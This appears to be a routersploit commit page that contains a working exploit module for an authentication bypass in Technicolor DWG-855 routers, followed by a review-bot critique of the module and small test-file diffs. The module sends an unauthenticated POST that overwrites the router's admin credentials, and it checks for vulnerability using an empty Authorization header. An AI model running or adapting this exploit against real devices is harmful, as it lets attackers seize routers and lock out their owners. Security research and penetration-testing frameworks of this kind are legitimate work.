Commit 3660f72d by fwkz

Merge branch '0BuRner-patch-1'

parents 2fe031c1 3e718929
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
http_request,
mute,
validators
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
"""
__info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'authors': [
'JPaulMora <https://JPaulMora.GitHub.io>',
# vulnerability discovery,routersploit module
],
'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
],
'devices': [
'Technicolor DWG-855',
]
}
target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
npass = exploits.Option('rpass', 'New password (overwrites existing password)')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self):
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
print_error("Target didn't answer request.")
elif self.vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_error("Unknown error, submit an issue.")
@mute
def check(self):
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache'}
response = http_request(method="GET", url=url, headers=headers)
if response is not None and self.vulnresp in response.text.encode('utf-8'):
return True
else:
return False
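Review bot: Both `check()` and `run()` look for the marker with `self.vulnresp in response.text.encode('utf-8')`, which round-trips the binary JPEG body through a guessed text decoding; assuming `http_request` returns a requests-style response, `self.vulnresp in response.content` compares the raw bytes instead. `run()` reuses the logo.jpg marker to judge the POST to `/goform/RgSecurity`, and a form response seems unlikely to contain it, so the module may report "Unknown error" after the credentials were in fact overwritten; the operator then has no accurate record of what changed on the device. The `Accept-language` header has `en;q,0.3` where `en;q=0.3` is meant, and the description string misspells "erase" and "stealthy". The `references` entry is free text, so an advisory or CVE link should replace it once one exists, which lets defenders map the module to a fix.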
......@@ -255,5 +255,6 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
'show options'
)
if __name__ == '__main__':
unittest.main()
......@@ -621,5 +621,6 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
]
)
if __name__ == '__main__':
unittest.main()
......@@ -52,5 +52,6 @@ class UtilsTest(RoutersploitTestCase):
]
)
if __name__ == '__main__':
unittest.main()
......@@ -136,5 +136,6 @@ class ValidatorsTest(RoutersploitTestCase):
value = "t"
self.assertEqual(validators.boolify(value), True)
if __name__ == '__main__':
unittest.main()